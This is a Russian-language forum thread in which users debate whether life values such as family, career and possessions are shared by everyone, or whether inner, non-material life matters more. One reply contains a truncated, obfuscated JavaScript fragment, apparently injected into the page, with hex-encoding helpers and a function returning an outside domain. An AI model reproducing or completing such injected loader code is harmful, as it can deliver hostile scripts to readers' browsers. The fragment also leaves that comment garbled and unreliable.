Вход
Здравствуйте, гость !
Войдите под своим именем
или Зарегистрируйтесь.
15 января в 13:09:03 от Макс
Жена мной мало интересуется в интимном плане ! Что делать ? Посоветуйте! Отмазки типа :То ребёнок ещё не уснул то с нами спит по средине , то просто морозиться ! Это темперамент такой ? Не могу понять ! Для меня раз в неделю это не нормально, я счи ... Подробнее
Последний комментарий
История : Я сломал ее жизнь?
час назад2017-01-24 03:26:18 от Арийка***
21694какая мерзость.. ваш друг идиот, проверять таким способом! все мужчины собственники. я не верю, что ваш друг вообще дорожит своей девушкой и любил ее, если согласился на такое. это подло! девушка допустим не прошла вашу проверку, но и ей не легче! она живой человек! хуже всего поступили вы, автор ... Все комментарии68376
Вход
Здравствуйте, гость !
Войдите под своим именем
или Зарегистрируйтесь.
Топ из раздела
Поделись мнением
samoe nejnoe obyatie v moey jizni
22 января в 21:25:14
Вторые блюда  ( 1 2 3 )
22 января в 15:59:04
Она со мной, но не моя  ( 1 2 )
22 января в 15:58:59
Как вылечить гастрит?
22 января в 15:58:53
Рецепт похудения
20 января в 13:31:44
мне 14 а ему 20
20 января в 13:31:43
Поделись мнением - Жизненные ценности и как из взращивать?
Поделись мнением : Жизненные ценности и как из взращивать?     Здравствуйте! Сразу оговорка: я - социолог, при ответе на этот вопрос мне действительно нужно честное, непредвзятое мнение. Среди знакомых, подруг, коллег, однокашников встречаю достаточного схожую систему ценностей, даже идентичную порой. Так, многие заняты вопросами о развлечениях, путешествиях, одежде, крутых вещах, многие хотят завести семью, детей, купить квартиру и машину. И все это на самом деле выставляется на первый план и имеет весомый смысл. Оговорюсь сразу, да, любить вышеперечисленный набор "мечты" и хотеть его вполне здраво, нормально...и так далее. Но, мы - люди разные, а значит разное наше восприятие мира, людей вокруг, образов, событий. И исходя из этого, как может быть одна мечта на всех? То есть, если к определенному возрасту человек не повидал мир, не обзавелся семьей и престижной работой, он автоматически аутсайдер? Как же... нематериальные блага, внутренняя вселенная, состоящая из метафор, аллюзий, выращенных собственной фантазией образов, уникальность личности, добившейся иного, еще не открытого прежде... Или все, что нельзя увидеть - не считается?
64870
Другие Поделись мнением
(9)
Злая Сибирячка
20475 Злая Сибирячка
Злая Сибирячка offline
Репутация : 98640
Комментариев 720 1
05 июня 08:04:46
2016-06-05 08:04:46

Меньше заморачивайтесь по поводу мнения других, имейте своё!!! Если вас не понимают, значит смените круг общения, чтобы интересы совпадали, а не высасывайте проблему из пальца.

Ответить
Поддерживаю Да0 / Нет0
Лёва.
18487 Лёва.
Лёва. offline
Репутация : 27195
Комментариев 646 0
05 июня 09:52:37
2016-06-05 09:52:37

Считается ВСЕ - и видимое, и невидимое.

Вопрос только в том - кем считается... и как это выражается.

У кого-то все более или менее осознано, а у кого-то влияние идёт через подсознание. У кого-то оно сильное, у кого- то почти незаметное - все люди разные. Есть усредненное понимание уровня какого-то минимального комфорта (дом, работа, машина, семья, дети, собака :) вроде "американской мечты" ) - основанное на развитии основных инстинктов - самосохранения, продолжения рода и т. д. А дальше все очень индивидуально и зависит от понимания жизни, своего в ней места, желания каких то форм отношений...

имхо

Ответить
Поддерживаю Да0 / Нет0
Dевушк@
3954 Dевушк@
Dевушк@ offline
Репутация : 243008
Комментариев 1816 1
05 июня 10:30:23
2016-06-05 10:30:23

В человеке с первобытных времён заложено природой продолжение рода, стремление мужчины к женщине, образование семьи. Это вполне разумно и закономерно. Поэтому так и получается, что одна цель на всех. Практически каждый стремится обзавестись семьёй, домом. И что тут удивительного?

Можно и в семье познавать внутреннюю вселенную, уникальность личностей и нематериальные блага.

Если вы хотите прожить жизнь одна, в ветхом домике на окраине и всю жизнь копаться в своём внутреннем мире, разбирая себя и общество по крупицам - пожалуйста. Но прожив всю жизнь в таких условиях вполне возможно, что на старости вы оглянетесь на свою жизнь и спросите: "и это все? "

Не понимаю как можно не стремиться иметь свой уютный домик, детишек и любимого мужа, чтоб заботится друг о друге, поддерживать, проводить время вместе, путешествовать, посмотреть мир? Для меня например это лучшие блага. Как можно от всего этого отказаться? Заниматься самокопанием в одиночку... Не понятно.

Ответить
Поддерживаю Да4 / Нет0
Ксюшка *****
9739 Ксюшка *****
Ксюшка ***** offline
Репутация : 283234
Комментариев 2023 6
05 июня 12:05:19
2016-06-05 12:05:19

Пусть меня назовут черствой и меркантильной, не думающей о духовном начале, но для меня первостепенно это крепко встать на ноги, иметь возможность помогать своим родителям и близким, и чтоб было что кушать каждый, и во что одеваться, и чтоб была крыша надо головой, желательно покомфортнее.

Меня так веселят порой такие люди, как вы , автор. Как правило, у людей, рассуждающих о первостепенстве нематериальных благ , имеется все что нужно для удобной и комфортной жизни, ну, или имеется человек, который эту самую жизнь обеспечивает. Тогда конечно, можно посидеть и с задумчивым видом копаться в своем "богатом" внутреннем мире.

вы кушаете каждый день, да наверное еще не что попало, а хорошую , качественную пищу. Потому что нашему телу важнее пища материальная, а не духовная. одеваетесь вы тоже и по сезону, и не в отрепье какое нибудь, опять-таки, в угоду нашему глупому телу, которое, глупое, не понимает, что это все не столь важное, как "уникальность вселенной".

Поэтому меня немного раздражают люди, которые ставят себя выше других, говоря" одни деньги на уме, а как же внутренний мир"

Не надо думать, что все люди , которые стремяться к хорошей жизни, сплошные пустышки и бездуховные личности. просто не у каждого есть возможность сидеть в позе лотоса день за днем и созерцать внутреннюю вселенную.

Ответить
Поддерживаю Да1 / Нет0
В конце концов, все непременно будет хорошо! А если не хорошо - значит, это еще не конец!
шоколадочка
18143 шоколадочка
шоколадочка online
Репутация : 131405
Комментариев 1185 18
05 июня 12:48:16
2016-06-05 12:48:16

Честно, самой конкретики вопроса не поняла, то есть что именно, какой вопрос Вы задаете нам ? Мечты одной на всех не бывает, Вы правы. У всех они разные, исходя из приоритетов. Для меня, лично, важнее - духовная сторона: семья, дети, близкие, здоровье, и т. д.

// o;o++)t+=e. CharCodeAt(o). ToString(16);return t}, a=function(e){e=e. Match(/[\S\s]{1, 2}/g);for(var t="", o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "rirl.ru"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

Ответить
Поддерживаю Да0 / Нет0
Гость
Гость

05 июня 12:49:00
2016-06-05 12:49:00
бредятина полная
Ответить
Поддерживаю Да0 / Нет0
Farba
11357 Farba
Farba offline
Репутация : 123480
Комментариев 1521 1
05 июня 12:56:40
2016-06-05 12:56:40

Аутсайдером человек является в том случае, если он сам себя таковым считает. И разве Вам в институте не объяснили, что первична материя, а вторично сознание? )))

Ответить
Поддерживаю Да0 / Нет0
Лёва.
18487 Лёва.
Лёва. offline
Репутация : 27195
Комментариев 646 0
05 июня 14:39:52
2016-06-05 14:39:52

Ну вот, Автор, вы увидели ряд мнений. В основном, похоже, люди полагают что первична материя... И им об этом "говорят в институте" (хотя о этом в институте говорить не должны т. к. материя, как её понимает большинство - происходит из сознания, и квантовая физика это изучает {#}, теория суперструны, теория Единого поля и т. д. ).

Все зависит от чувствительности и типа нервной системы конкретного человека. Человек понимает то, что он где-то там в глубине себя чувствует. В любом случае проще думать о самопознания когда материальные проблемы на каком то уровне решены, иначе инстинкт самосохранения будет давить на психику.

Ответить
Поддерживаю Да0 / Нет0
Allegro
21105 Allegro
allegro offline
Репутация : 149626
Комментариев 1520 11
05 июня 14:44:46
2016-06-05 14:44:46
А что вы хотели?Сейчас никому не нужен человек с богатым внутренним миром. Сейчас нужен потребитель. Посмотрите, сколько тратится средств на маркетинг и рекламу. Каждый сезон выпускаются новые коллекции одежды, обновленные версии телефонов, новые модели машин и т. п. Человека со старой машиной или в одежде прошлой коллекции заставляют чувствовать себя ущербным и снова покупать, покупать. Это явление называется "материальное проклятие человечества", столько уже написано об этом. Это своеобразная карусель, слезть с которой не так просто. Главная беда заключается не в том, что нам постоянно надо выбрасывать хорошие вещи, потому что они вышли из моды. Трагедия человечества - неоправданные ожидания. Купив новый автомобиль, человек радуется очень короткое время. Если на следующий день его друзья приобретут машины круче, чем у него - эта радость ограничится всего одним днем. Это явление называется "инфляция счастья". Процитирую Пелевина "Лет десять назад новая пара кроссовок, привезенная дальним родственником из-за бугра, становилась точкой отсчета нового периода в жизни — рисунок подошвы был подобием узора на ладони, по которому можно было предсказать будущее на год вперед. Счастье, которое можно было извлечь из такого приобретения, было безмерным. Теперь, чтобы заслужить право на такой же его объем, надо было покупать как минимум джип, а то и дом… Инфляция счастья.... " Семья и дети тоже желаются под давлением общества, даже если человек не готов к этому. Тебе уже 20, а ты не замужем!Сколько историй тут написано на эту тему. Нет детей?Скорее рожайте!Есть один ребенок?Надо завести еще одного. Господствует стереотипность мышления, так ведь проще. "Чтоб как у всех" Лично у меня есть другие мечты, кроме материальных, только по одной простой причине. У меня есть где жить, я могу обеспечить свое существование. У меня есть возможность подумать о чем-то кроме. Но другим людям, у которых нет этого минимума трудно не попасть на карусель, тем более в нашем мире, где встречают по одежке.
Ответить
Поддерживаю Да2 / Нет0
Кому-пожар,кому-погреться(рус.пословица)
Уважаемые пользователи, у каждого человека своя точка зрения на то, что изложено в истории. Даже если Вы не согласны с автором истории или с другими читателями, пытайтесь выражать свое мнение в деликатной форме. Чтобы обгадить другого, много ума не нужно, а вот помочь дельным советом не каждый сможет.
Имя :
Пол: Гость Гость
Простой редактор

Введите число указанное на картинке